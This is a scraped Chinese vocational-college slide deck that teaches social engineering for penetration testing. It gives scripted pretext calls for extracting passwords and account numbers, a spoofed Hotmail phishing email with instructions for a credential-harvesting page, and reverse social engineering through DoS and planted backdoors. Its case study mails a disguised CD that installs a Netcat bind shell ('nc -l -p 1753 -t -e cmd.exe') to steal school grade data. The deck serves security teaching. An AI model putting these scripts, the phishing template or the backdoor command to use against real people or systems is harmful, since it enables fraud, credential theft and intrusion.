学习情境一网络攻击信息的搜集任务一社会工程学的应用与课件.ppt

上传人(卖家):晟晟文业 文档编号:4106949 上传时间:2022-11-11 格式:PPT 页数:31 大小:556.01KB
下载 相关 举报
学习情境一网络攻击信息的搜集任务一社会工程学的应用与课件.ppt_第1页
第1页 / 共31页
学习情境一网络攻击信息的搜集任务一社会工程学的应用与课件.ppt_第2页
第2页 / 共31页
学习情境一网络攻击信息的搜集任务一社会工程学的应用与课件.ppt_第3页
第3页 / 共31页
学习情境一网络攻击信息的搜集任务一社会工程学的应用与课件.ppt_第4页
第4页 / 共31页
学习情境一网络攻击信息的搜集任务一社会工程学的应用与课件.ppt_第5页
第5页 / 共31页
点击查看更多>>
资源描述

1、学习情境一学习情境一 网络攻击信息的搜集网络攻击信息的搜集任务一任务一 社会工程学的应用与防护社会工程学的应用与防护 课程负责人:杨文虎课程负责人:杨文虎济南铁道职业技术学院济南铁道职业技术学院 信息工程系信息工程系网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护教学的实施过程教学的实施过程任务规划任务规划学生探究学生探究师生析疑师生析疑完成任务完成任务检查评测检查评测综合创新综合创新思考、探讨完成任务需要思考、探讨完成任务需要的相关资料,搜集资料,的相关资料,搜集资料,制定工作计划制定工作计划 明确需要完成的工作明确需要完成的工作任务;任务;教师进行点评、确定教

2、师进行点评、确定最终的实施方法;对最终的实施方法;对技术问题进行讲授和技术问题进行讲授和答疑。答疑。学生进入网络实训室,根学生进入网络实训室,根据工作计划完成每个工作据工作计划完成每个工作项目,完成每个项目实施项目,完成每个项目实施日志和心得总结日志和心得总结 学生分角色相互检查任务学生分角色相互检查任务完成情况,分析不足,给完成情况,分析不足,给出评价;教师对学生的日出评价;教师对学生的日志和总结进行分析,给出志和总结进行分析,给出评价。评价。探索更多的社会工程学探索更多的社会工程学的应用与防护的方法,的应用与防护的方法,搜索相关技术,并在实搜索相关技术,并在实训室中进行验证。训室中进行验证

3、。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护什么是社会工程学应用与防护?具体有几种形式?假冒技术支持战术的要点。熟练掌握邮件假冒的方法及技术要求。了解末端用户假冒、客户假冒、反向社会工程的含义。问题引领问题引领网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目一、假冒技术支持项目一、假冒技术支持 社会工程攻击的方法何很多,下面介绍假冒技术支持战术:可以考察以下用于获取数据网络访问权的不同伪装示例。最成功的社会工程师是那些能够以创新的方法劝导其他人向其提信息的人。社会工程的最常见形式是假冒技术支持这里假冒一名正在手机信息的技术支

4、持工程师,收集的信息包括口令。渗透测试者:你好,我是技术支持部的张涛你注意到你的系统变慢了吗?渗透测试者:你好,我是技术支持部的张涛你注意到你的系统变慢了吗?受骗用户:还好,似乎还不太慢受骗用户:还好,似乎还不太慢 渗透测试者:嗯,我们看到网络速度下降很多渗透测试者:嗯,我们看到网络速度下降很多 好的让我登录你的好的让我登录你的PCPC上,测上,测试一下你的机器。你的用户名是试一下你的机器。你的用户名是jeouserjeouser,对吗,对吗?受骗用户:是。受骗用户:是。一般来说,用户名与电子邮件地址中的名称相同。比如,如果电子邮件地址为。那么在企业网络中的用户名很可能就是jeouser。我们

5、可以从大多数企业的Web网站收集电子邮什地址。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目一、假冒技术支持项目一、假冒技术支持 渗透测试者:很好,让我查一查你的口令嗯,系统太慢了,你渗透测试者:很好,让我查一查你的口令嗯,系统太慢了,你的口令是什么?的口令是什么?受骗用户:是受骗用户:是abc123abc123。渗透测试者:好,我进去了。似乎还不太坏。一定是没有受到渗透测试者:好,我进去了。似乎还不太坏。一定是没有受到同楼层其他用户的影响,奇怪。好了,我要查一查其他楼层的情况。同楼层其他用户的影响,奇怪。好了,我要查一查其他楼层的情况。谢谢你。谢谢你。受骗

6、用户:也谢谢你的帮助受骗用户:也谢谢你的帮助。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目一、假冒技术支持项目一、假冒技术支持 这个示例展示了一个技术支持假冒的策略。在现实场景中,应该向用户询问更多问题以便建立用户对你的信任。在了解企业内部网络的过程中加入一些幽默元素。企业网络中最容易被忽略和未加保护的区域是在家庭中办公的远程工作人员使用的机器。作为渗透测试人员,应该测试这些远程用户。通常情况下,对这些人实施社会工程更容易获得成功,原因在于他们远离办公室,而在办公室的人员可能会受到安全培训和提醒。远程用户通常是通过电话或支持人员的帮助来处理一些设置情况的。

7、网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目二、第三方假冒项目二、第三方假冒 技术支持假冒的缺点之一是这个假冒是在太常见了。公司已经意识到这种假冒技巧并要求防范。另一种技巧是第三方假冒,它能够更成功的获取内部信息。渗透测试者:你好,我是渗透测试者:你好,我是“值得信赖咨询公司值得信赖咨询公司”的工作人员,我想给你介绍一的工作人员,我想给你介绍一下我们公司新的防火墙产品。下我们公司新的防火墙产品。受骗用户:不错,但我们对现有产品已经很满意了受骗用户:不错,但我们对现有产品已经很满意了 渗透测试者:真的吗渗透测试者:真的吗?你们正在使用哪种类型的防火墙你们正在

8、使用哪种类型的防火墙 受骗用户:我们现在用受骗用户:我们现在用PlXPlX和和NetscreellNetscreell防火墙防火墙 渗透测试者:好,这两款产品都十分优秀,但你注意到了像渗透测试者:好,这两款产品都十分优秀,但你注意到了像SmurlSmurl和和Ping Of Ping Of DeathDeath这样的拒绝服务攻击的风险了吗。你的防火墙能够抵挡这些类型的攻击吗这样的拒绝服务攻击的风险了吗。你的防火墙能够抵挡这些类型的攻击吗?(Smurf攻击是以最初发动这种攻击的程序名Smurl来命名。这种攻击方法结合使用了IP欺骗和ICMP回复方法使大量网络传输充斥目标系统,引起目标系统拒绝为正

9、常系统进行服务)(这种攻击通过发送大于65536字节的ICMP包促操作系统崩溃;通常不可能发送大于65536个字节的ICMP包,但可以把报文分割成片段,然后在目标主机上重组:最终会导致被攻击目标缓冲区溢出。)网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目二、第三方假冒项目二、第三方假冒 受骗用户:当然能。受骗用户:当然能。渗透测试者:不错,我知道你对现有的产品很满意现在,我们的产品能够通过渗透测试者:不错,我知道你对现有的产品很满意现在,我们的产品能够通过特殊过滤有效地保护电子邮件服务器。你的产品能够保护邮件服务器吗特殊过滤有效地保护电子邮件服务器。你的产品

10、能够保护邮件服务器吗?受骗用户:这个问题我们并不关心,因为我们不允许互联网上的邮件进八到我受骗用户:这个问题我们并不关心,因为我们不允许互联网上的邮件进八到我们的系统中。我们的邮件都来自总部。们的系统中。我们的邮件都来自总部。渗透测试者:喔,看起来你对现有产品很满意。我不浪费你的时间了。我把我渗透测试者:喔,看起来你对现有产品很满意。我不浪费你的时间了。我把我的电话号码和姓名留给你,在你需要的时候可以给我打电话(留下一个假名和假的的电话号码和姓名留给你,在你需要的时候可以给我打电话(留下一个假名和假的电话号码原因在于目标或许永远不会打这个电话电话号码原因在于目标或许永远不会打这个电话)。在这个

11、简短的示倒中,你能够发现防火墙的类型及它的一些配置。你会了解到,该公司或许阻塞或限制了ICMP协议,Smurf、和Ping Of Death攻击使用了这个协议。你还知道电子邮件系统使用的TCP端口 25不能通过互联网访问。这样就节省了扫描这些协议的大量时间,减少了被发现的风险。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目二、第三方假冒项目二、第三方假冒 使用电话并不是第三方假冒的唯一选径,也司以进行现场的第三方假冒。我曾经作为一名计算机工程师进入某象金融机构。我告诉前台我接到电活,公司的服务器发生了一些问题,我需要到那里修复服务器。前向把我带到电梯旁,刷了

12、她的通行卡让我进去。我走到了限制访问的二楼,这是数据中心所在地。之后我走到二楼的接待员那里。这项测试是IT经理预先安排的,他在这一天特意离开了办公楼以便检测公司人员对社会工程攻击的响应。当我告诉接待我要去修复服务器时他说经理外出了,没有人告诉她技术工程师要来。她问我是否能够第二天再来,我告诉她我是按小时付费并且驱车两小时才到这里,如果今天我必须旧去然后第二天再来就会产生大量费用,知道这些后,她决定汁我进去:她把我带到了数据中心。数据中心保护得相当好。它有两道门,所有进入的人都需要身份验证才能够进入,出于某种原因,接待员没有让我签名。我吃惊地发现,地能够进人员到数据中心,接待帮我打开了数据中心的

13、两道门,我直接走进了数据中心,而且没有接受身份验证或者询问我到部里的目的。她告诉我的唯一问题就是她没有服务器的口令。我告诉她这不是问题。(一个简单的口令破解工具就能够搞定它)经过运行几分钟的安全扫描,我发现了数据中心及远程位置的所有设备,当然也发现了使用默认口令的所有设备。在我登录到拥有简单口令的一台服务器上之后,我能连接到所有服务器,当IT经理知道我能够连接到所有的服务器,能够这么轻松的访问公司所有信息之后,你可以想象她的吃惊程度。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目二、第三方假冒项目二、第三方假冒 第三方假冒的另一个示例是你假装为某个贸易杂志的

14、记者,你正在做公司产品的评论。绝大多数员工期待知道他们会在杂志中出现。在他们的热功期待中,经常会送出免费产品,泄露不应该与外界分享的内部信息。这就是为什么公关人员应该出现在会面中样品产品只应该在验证了访问者的身份之后才能够发放的原因。你或许会发现,当IT经理认为他正在面谈有关他的数据安伞时他愿意泄露多么的信息。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目二、第三方假冒项目二、第三方假冒 渗透测试者:到目前为止,你为保护你的基础设施的安奎采取的步骤给我留下渗透测试者:到目前为止,你为保护你的基础设施的安奎采取的步骤给我留下了很深刻的印象、了很深刻的印象、(拍

15、马屁是打开更多信息大门的第一步,拍马屁是打开更多信息大门的第一步,)受骗用户:谢谢,在我们公司,我们把安全看得十分重要。受骗用户:谢谢,在我们公司,我们把安全看得十分重要。渗透测试者:我已经感受到了。你们公司强制实施什么安全策略了吗?渗透测试者:我已经感受到了。你们公司强制实施什么安全策略了吗?受骗用户:嗯,当然,我们制定了可接受的互联网采略和口令策略,公司的所受骗用户:嗯,当然,我们制定了可接受的互联网采略和口令策略,公司的所有员工在进入公司时都要签署这些策略。有员工在进入公司时都要签署这些策略。渗透测试者:很不错详细谈一谈,这很有趣。渗透测试者:很不错详细谈一谈,这很有趣。受骗用户:嗯,例

16、如,我们的口令策略要求所有用户的口令至少要八个字符受骗用户:嗯,例如,我们的口令策略要求所有用户的口令至少要八个字符长并且同时包含字母和数字。要求口令每三个月就要更换一次口令。长并且同时包含字母和数字。要求口令每三个月就要更换一次口令。渗透测试者:真的不错,我听说,有些公司也强制实施这样的策略,但员工可渗透测试者:真的不错,我听说,有些公司也强制实施这样的策略,但员工可能会写下他们的口令,并把它放在键盘下面能会写下他们的口令,并把它放在键盘下面 你们公司存在这样的问题吗?你们公司存在这样的问题吗?受骗用户:哈哈哈是的,总是芡生这样的情况我希望能蝣杜绝发生这样的事受骗用户:哈哈哈是的,总是芡生这

17、样的情况我希望能蝣杜绝发生这样的事情我敢打赌我们的用户中有情我敢打赌我们的用户中有5050上的用户会把口令写在他们办公桌的某个地方。上的用户会把口令写在他们办公桌的某个地方。这个简短的会面揭示,获取进入公司权限的最容易的办法就是在用户的办公桌上寻找口令。你可在当天的晚些时候进入办公楼许要求使接待休息事。在下班之后(以及打扫卫生人员进来之前),你可以离开休息室走进办公率在办公桌上寻找能够得到访问权的口令。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目二、第三方假冒项目二、第三方假冒 这里是曾经发生的一个示例。几年前,马杰去一家不动产公公司在管理员离开之后的安全

18、性。当他走到管理员的办公桌前他发现了几张马匹的照片,马杰猜想他一定拥有其中的一些马匹,就故意对旁边的小隔间大声感叹,“哇,多么漂亮的马呀!,这是他的马吗?”在得到了肯定之后,马杰问“他们叫什么名字?”果然,网络管理员使用的口令是这些马匹的名字之一。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目三、邮件假冒项目三、邮件假冒 直接到现场和使用电话不是假冒唯一独有的两种方法。电子邮件也是从疑心不大的人那里提取信息的可靠方法。下面的示例演示了这一过程:From:visa Credit To:xxxhotmailcom Date:wed,July 5th,2006 0

19、4:1 1:03-0500 Subject:Visa Credit Check Reply-To:Visa Credit Service creditvisacredit-com Received:flrom fnx chi a coin(mx wash a co,u10 1 2 31)by mailserverl washa com with SMTP id A93AABVQ35A for xxxxh0Ilaillcom(sender thiefhackmynetwork corn):Wed,July 5th,2006 03:09:0 1-0500(EST)XMailef:Microsoft

20、 Outlook Express 6,00 2800 1 1 58 MIMEVersion:1 0 ContentTvpc:texthtml:charset=iso一8859一 ContentTransferEncoding:8bit XPriority:3 fNormall XContentStamp:2:3:181 8012451 ReturnPath: MessageID:网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目三、邮件假冒项目三、邮件假冒 直接到现场和使用电话不是假冒唯一独有的两种方法。电子邮件也是从疑心不大的人那里提取信息的可靠方法。下面的示

21、例演示了这一过程:From:visa Credit To:xxxhotmailcom Date:wed,July 5th,2006 04:1 1:03-0500 Subject:Visa Credit Check Reply-To:Visa Credit Service creditvisacredit-com Received:flrom fnx chi a coin(mx wash a co,u10 1 2 31)by mailserverl washa com with SMTP id A93AABVQ35A for xxxxh0Ilaillcom(sender thiefhackmyn

22、etwork corn):Wed,July 5th,2006 03:09:0 1-0500(EST)XMailef:Microsoft Outlook Express 6,00 2800 1 1 58 MIMEVersion:1 0 ContentTvpc:texthtml:charset=iso一8859一 ContentTransferEncoding:8bit XPriority:3 fNormall XContentStamp:2:3:181 8012451 ReturnPath: MessageID:网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目三

23、、邮件假冒项目三、邮件假冒要解释在渗透测试中使用诱骗邮件的重要性的最好方法是通过示例说明它们是如何被恶意利用的。创建一个带有诱骗邮件头的电子邮件。在邮件中包含下述消息:Importance:HIGH We hope you are enjoying Microsoft Hotmail servicesDue to recent security concemswe ale upgrading all of our servers using a new authentication mechanismThis will require all users to change their pas

24、swordsThe new authentication mechanism will take Dlace December l,2006All subscribers who have not changed their passwords using the hyperlink below will not be able to access Hotmail services 1.You will need to change your email password by May 312006To do SO,please Iog in at this URL:http:/passpor

25、thotmailloginasp333868852/10ginAsp and change your password under PASSWORD 网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目三、邮件假冒项目三、邮件假冒 2Please allow at least 5-6 minutes for your account to register the password update 3.If you face any login problems due to this password changeplease try the process ag

26、ain later。We apologize for any inconvenience this may have causedWe hope you understand that we are making this change for your benefit and that it is part of our continuous efforls to improve Microsoft Hotmail services Sincerely,Bob Smitll Executive Director of Hotmail Security Microsoft Hotmail Su

27、pport http:/wwwmicrosoftcom 网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目三、邮件假冒项目三、邮件假冒 在电子邮件收件人单击包含在这个邮件中的链接后,他被引导到web网站。之后收件人输入它的用户名和口令,但不是把这些信息发送给微软,而是把信息邮寄给你。他的工作方式如下:首先,使用电子邮件诱骗程序建立一个假冒的电子邮件。将像前面所示的包含官方味道的电子邮件发送给收件人。一定要让邮件名看起来也很可信。像前面接下来,包含在链接中的十进制编码的URL,前面的示例中,URL为http:/www microsoft com/passport/

28、hotmail/asp333868952loginasp。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目三、邮件假冒项目三、邮件假冒 在符号之后包含了一个二进制编码的链接,之前的所有内容都被忽略。在这个示例中,链接的开始有个链接到微软Hotmail服务的虚假链接,连接到真实URL地址333868852login asp。要创建一个编码URL,那么从示例中,收件人被带到了你指定IP地址的Web问站 为伪装编码后的这个IP地址,现在创建一个Web页面,该Web页面要与真实Web页面的外观相同。修改网站的源代码,让Submit按钮将窗体的内容发到你的Web服务器的

29、某个位置或通过电子邮件邮寄到你的邮箱中.另一种方法是,你可以注册一个看起来差不多的网站。比如,你可以把用户引导到http:/www.Y上。粗略地看起来,这个地址与Yahoo的网站地址相同。然而,仔细地看一下,你会发现它在名称中使用了数字0,它不是Yahoo的门户网站。发送将收件人导到假冒Web网站的电子邮件的过程称之为钓鱼(Phishing)。根据调查,88的电子邮件使用目标的域名进行欺诈。一个名称为NakedWife的流行病毒通过电子邮件传播,邮件主越为“asked Wife”,一旦收件人打开附件,就会安装该病毒。另外一种诱骗是通知某人中了某个大奖。尽管可以通过邮件来做这样的事情,但这种类型

30、的消息看上去让人觉得很可疑。取而代之的是,如果通过普通的邮局信件来发送这样的消息,绝大多数人就会相信这样的信件。渗透测试人员可以作为员工教育计划的一部分来雇用。通过发送钓鱼邮件或其他类型的诱骗消息,它们可以评估组织机构中的员工是否对这类欺诈保持敏感性及如何对它作出回应。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目四、末端用户假冒、客户假冒、反向社会工程项目四、末端用户假冒、客户假冒、反向社会工程一、末端用户假冒一、末端用户假冒 如果你能够进入到企业办公楼中,你可以假冒末端用户打电话给支持中心。从找到 一台未用的工作站开始。当它引导起来后,工作站通常显示最后

31、一个使用它的用户的名称。按下来,多次在密码提示框中键入一些伪造的口令。正常情况下这将导致该账户被锁起来并要求出系统管理员解锁。打电话给支持中心,并假装你就是那个用户。告诉IT工作人员你忘记了口令,并且已经把自己锁在了网络之外。之后他会解锁你的账户并向你提供一个新的口令。现在你就以那个用户置录到网络上。你会为这个伎俩成功的概率之高感到吃惊。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目四、末端用户假冒、客户假冒、反向社会工程项目四、末端用户假冒、客户假冒、反向社会工程二、客户假冒二、客户假冒 如果说还有什么地方需要社会工程师进行测试,那就是客户服务中心。客户服

32、务代表有权限访问账号、信用卡号码以及社会安全号码(在美国,其他国家往往是身份证号码)。假设渗透测试人员使用下面的场景打电话给信用卡客户服务中心:渗透测试者:喂,我要查一查我卡上的余额。受骗用户:没问题,你的账号是多少受骗用户:没问题,你的账号是多少?渗透测试者:不好意思,信用卡现在没有在我手边。但我有我的地址。渗透测试者:不好意思,信用卡现在没有在我手边。但我有我的地址。(你会你会发现可以很容易地使用电话号码本采查到地址发现可以很容易地使用电话号码本采查到地址)受骗用户:没有你的账号号码,我无法给你查账户信息。受骗用户:没有你的账号号码,我无法给你查账户信息。渗透测试者:帮帮忙吧。今天是我渗透

33、测试者:帮帮忙吧。今天是我5050周年结婚纪念日,我的妻子现在正在医院。周年结婚纪念日,我的妻子现在正在医院。我想在下班后给她买一些补品,但不能肯定我的账户上是否还有足够的钱。你能帮我想在下班后给她买一些补品,但不能肯定我的账户上是否还有足够的钱。你能帮我查一查余额还有多少吗我查一查余额还有多少吗?谢谢你。谢谢你。受骗用户:好吧。你的地址是什么受骗用户:好吧。你的地址是什么?假设告诉了对方某个地址,客户服务人员说出了余额,继续下面的谈话:渗透测试者:真是太感谢你了。我想网上订购一些东西,在今天就交竹到我妻渗透测试者:真是太感谢你了。我想网上订购一些东西,在今天就交竹到我妻子那里。给她一个惊喜。

34、嗯,但我现在手头没有账户号码。你可以帮我念一念账户子那里。给她一个惊喜。嗯,但我现在手头没有账户号码。你可以帮我念一念账户号码吗号码吗?受骗用户:好的。号码是受骗用户:好的。号码是网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目四、末端用户假冒、客户假冒、反向社会工程项目四、末端用户假冒、客户假冒、反向社会工程 但是信用卡公司不会落入这样的陷阱。他们为什么不会落入这类陷阱的原因是他们雇佣了渗透测试人员作为社会工程师对客户代表进行了测试,并制定了严厉的惩罚措施。正是这个原因,伪装为公司内部人员打电话通常会更容易成功。网络安全与防护网络安全与防护1.1社会工程学的

35、应用与防护社会工程学的应用与防护项目四、末端用户假冒、客户假冒、反向社会工程项目四、末端用户假冒、客户假冒、反向社会工程三、反向社会工程三、反向社会工程 反向社会工翟比前面舶示例要略微复杂一些,但它的有效性不容怀疑。反向社会工程(Reverse Social Engineering,RSE)由下述三步组成:破坏 广告 支持 在反向社会工程中,角色颠倒了过来。这里,不是像前一节讲述的那样打电话寻求帮助攻击者让用户给他打电话来寻求帮助。反向社会工程的操作方法是首先破坏目标网络,这可以通过拒绝服务攻击(DoS)来实现。之后向该公司发送广告,以网结安全工程师的身份推荐你的服务,说明在对抗拒绝服务攻击方

36、面体的特殊技能。当公司雇用了你的服务之后,你开始提供支持井修复问题,与此同时。在公司网络中安装后门程序,这样你可以在以后需要的时候进入到公司网络中。成功实施反向社会工程的最佳途径并不是一开始就发起攻击,而足等待到互联网上传播一种新的病毒时发起攻击。以在病毒防护方面的特殊技能作为内容发布你的服务广告,当你在修复公司问题的时候,建立一种通过开启防火墙或安装后门程序的方法,打开从互联网上进入该公司网络的通道。作为渗透测试人员,这一点变得极为困难,原因在于在第一次测试之后IT工作人员开始熟悉了你。对于利用下次病毒在互联阿上发作进行此类攻击,你应该得到管理层的书面允许。网络安全与防护网络安全与防护1.1

37、社会工程学的应用与防护社会工程学的应用与防护项目五、综合案例研究项目五、综合案例研究 这个案例研究要求渗透测试者李明被鹰用来对一所小学做社会工程测试。其目标是获取学校系统的访问权限修改学生的成绩。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目五、综合案例研究项目五、综合案例研究 李明要做的第一步工作就是了解这所学校使用的学籍管理软件。他开始在互联同上进行搜索寻找通用的学籍管理软件。李明找到了一些这样的软件,包括ActiD、Gradebook、AutoGrad、Grade Genie、ThinkWave,Next 5 G,ading、共拓学籍管理、点通学藉管理

38、等。李明也浏览了一些教育论坛寻找讨论各学搜使用IT技术的情况。通过收集这方面的情况,事明找到了附近的一所小学,名字为”东方小学”。掌握了这些情况之后,李明在打电话时就胸有成竹了。李明打电话给这所学校,请求与负责技术的人员通话。对方将他介绍绐一位名叫马涛的技术人员。下面是他们之间的淡话:李明:你好,是马涛马先生吗李明:你好,是马涛马先生吗?我是李明,我在附近的我是李明,我在附近的“惠民小学惠民小学”工作领导工作领导刚分配我负责学校的技术工作,但说实话,我对技术了解不多,因此我希望能够得刚分配我负责学校的技术工作,但说实话,我对技术了解不多,因此我希望能够得到你的帮助。到你的帮助。至此,事明已经说

39、出了他的期待。由于人们通常都乐于帮助别人,李明认如马涛会乐于帮助他。马涛;李明你好。你在惠民小学?赵华怎么了马涛;李明你好。你在惠民小学?赵华怎么了?我知道她在那所学校负责技我知道她在那所学校负责技术术 李明:呵呵,她现在不做这个工作了。但现拉她升官了。我是她的手下,她是李明:呵呵,她现在不做这个工作了。但现拉她升官了。我是她的手下,她是一个很好的人。一个很好的人。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目五、综合案例研究项目五、综合案例研究 尽管看起来李明就要露馅了,但谎称赵华升职了。李明还通过赞扬她的话语来使谈话更轻松起来。李明:最近,赵华让我考察一

40、下新的学籍管理软件的事情。我看了几个软件比李明:最近,赵华让我考察一下新的学籍管理软件的事情。我看了几个软件比如:共拓学籍管理、一点通学藉管理等但我不能确定哪一个软件最灵活,你们用如:共拓学籍管理、一点通学藉管理等但我不能确定哪一个软件最灵活,你们用的是哪个学籍管理软件?的是哪个学籍管理软件?李明陈述了自己在学籍管理软件方面的知识,来免除马涛对自己教育背景的怀疑李明还询问马涛哪一个软件软件最灵活,原因在于他在论坛中已经看到这些软件的流行程度和灵活程度的排名。马涛:我们一直在使用马涛:我们一直在使用GradebookGradebook对这个软件我们很满意。对这个软件我们很满意。至此,李明继续问一

41、些与这个软件有关的问题,依据是事先对这个软件的了解。当谈话结束时,李明已经知道了这个学校使用的学籍软件的类型负责技术的工作人员的姓名是马涛。在下一个阶段,李明选择了另一个人与马涛联系,原因在于他可能会听出李明的声音。此外,由于马涛是位男士,常言道,男女搭配干活不累,因此,李明请他的同事王晨冒充ThinkWave的销售代表来打这个电话。在与马涛联系之前,王晨等待了数周,以避免惹人注目。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目五、综合案例研究项目五、综合案例研究 王晨:你好,是马涛吗王晨:你好,是马涛吗?我是我是ThinkWaveThinkWave公司的业

42、务代表王晨。我们想请你参加公司的业务代表王晨。我们想请你参加我们的客户改进计划,作为回报,在未来软件升级时,贵校可以得到我们的客户改进计划,作为回报,在未来软件升级时,贵校可以得到2020的折扣。的折扣。由于大多数公办学校的资金都比较紧张,因此可以合理地认为马涛会被这个省钱的说辞打动。马涛:是吗马涛:是吗?需要我做些什么需要我做些什么?王晨:这样,我将向你发送一款报告软件,你把它放在服务器上。在发送给你王晨:这样,我将向你发送一款报告软件,你把它放在服务器上。在发送给你的邮件中,包含了这个软件的配置方法。这个软件的主要功能是。在系统出现任何的邮件中,包含了这个软件的配置方法。这个软件的主要功能

43、是。在系统出现任何错误时他都生成一份报告,并发送给我们。它不发送任何个人信息仅仅发送计错误时他都生成一份报告,并发送给我们。它不发送任何个人信息仅仅发送计算机的类型、发生错误的时间、发生错误时系统中运行的进程。通过从我们的客户算机的类型、发生错误的时间、发生错误时系统中运行的进程。通过从我们的客户那里收集这些信息我们希望在未来的发行版本中能够减少软件错误。那里收集这些信息我们希望在未来的发行版本中能够减少软件错误。马涛:很好呀。马涛:很好呀。在这次通话之后,李明从网上下载ThinkWave的标志,并在信纸的抬头上印上这个标志。李明在网上找到FainkWave的地址,并向马涛寄送一个包裹,寄件人

44、地址写上ThinkWave的地址。包括中包含了一张带有Nctcat实用程序(当然你也可以使用其他的木马程序)的CD和一封信,信的内容为:网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目五、综合案例研究项目五、综合案例研究马先生,你好:感谢参与本公司客户改进计划。我们确认你的协助将会帮助改进我们产品未来发行版本的质量。与这封信一起寄给您的十一章包含报告软件的CD。当系统中发生错误时这个软件将会生成一份报告,并发送给我们。我向你保证不会发送任何个人信息。安装这个报告程序的方法是将CD放到服务器光驱中,它将自动启动安装程序,如果没有启动的话,使用setup.exe安

45、装。这个报告程序使用TCP端口1753,您需要在防火墙上打开这个端口。打开这个端口的具体方法,请参阅您的防火墙文档。通过参与我们的客户改进计划,在未来软件升级时,你将自动得到20%的折扣。感谢你的支持和参与。祝身体健康、一切顺利!ThinkWave公司代表 王晨 2007年4月26日网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目五、综合案例研究项目五、综合案例研究 CD的内容是李明生成的一个安装程序,它将Netcat安装在服务器硬盘的根目录下:Netcal是一个后门应用程序,它为李明提供了进入服务器的远程访问。安装脚本使用下面的参数启动Netcat:c:nc

46、-l-p 1753-t-e cmd.exe 数天之后,李明请王晨打电话给马涛。王晨:你好,我是王晨,我这次打电话是想问一问你,在安装我们的报告软件王晨:你好,我是王晨,我这次打电话是想问一问你,在安装我们的报告软件时遇到什么问题了没有时遇到什么问题了没有?马涛:没有,一点问题也没有。马涛:没有,一点问题也没有。王晨:这就好。我们就想听到这样的话。现在我们需要知道你的外部王晨:这就好。我们就想听到这样的话。现在我们需要知道你的外部IPIP地址,地址,以便在我们收到报告时,知道这份报告来自你那里。以便在我们收到报告时,知道这份报告来自你那里。马涛:没问题。我查一查,找到了,马涛:没问题。我查一查,

47、找到了,IPIP地址是地址是20020030030055552828 王晨:太谢谢你了。如果你有什么需要,就告诉我们。你有我们的技术支持电王晨:太谢谢你了。如果你有什么需要,就告诉我们。你有我们的技术支持电话号码吗。话号码吗。马涛:我有。马涛:我有。网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目五、综合案例研究项目五、综合案例研究 李明已经掌握了ThinkWave的电话号码,这样,在需要的时候,王晨就能够把它说出来,以便不引起马涛的怀疑。现在可以访问这个学校的服务器了。李明在他的计算机上输入下述命令:C:nc 200-3005528 1753 这个命令试图使

48、用端口1753建立与那所小学服务器的连接。果然,在李明查看它屏幕时,看到自己已经获取了该服务器的访问。李明执行一条目录列表命令确认成功访问:C:dir Volume in drive C has no label Volume Serial Number is 84968025 Direccory of C:06012004 04:l0 PM Thinkwave 04142004 03:ll PM DIR WINNT 04142004 07:43 AM AUTOEXECBAT 网络安全与防护网络安全与防护1.1社会工程学的应用与防护社会工程学的应用与防护项目五、综合案例研究项目五、综合案例研究 现在,李明已经能够访问学校的服务器。他转到学籍管理软件的安装目录,并把数据复制到本地算机上。李明记录了整个过程,并抓了几张屏幕截图,一边在以后将它们添加到报告中。李明使用文本编辑器打开下载的文件在文件010521edt中发现下述内容,确认它是学生成绩文件:010521 语文 A 010521 数学 B 010521 物理 A 仅仅通过几个电话和几条命令,李明就获取了学校服务器的访问,得到了所有学生的成绩。谢谢!

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 办公、行业 > 各类PPT课件(模板)
版权提示 | 免责声明

1,本文(学习情境一网络攻击信息的搜集任务一社会工程学的应用与课件.ppt)为本站会员(晟晟文业)主动上传,163文库仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。
2,用户下载本文档,所消耗的文币(积分)将全额增加到上传者的账号。
3, 若此文所含内容侵犯了您的版权或隐私,请立即通知163文库(发送邮件至3464097650@qq.com或直接QQ联系客服),我们立即给予删除!


侵权处理QQ:3464097650--上传资料QQ:3464097650

【声明】本站为“文档C2C交易模式”,即用户上传的文档直接卖给(下载)用户,本站只是网络空间服务平台,本站所有原创文档下载所得归上传人所有,如您发现上传作品侵犯了您的版权,请立刻联系我们并提供证据,我们将在3个工作日内予以改正。


163文库-Www.163Wenku.Com |网站地图|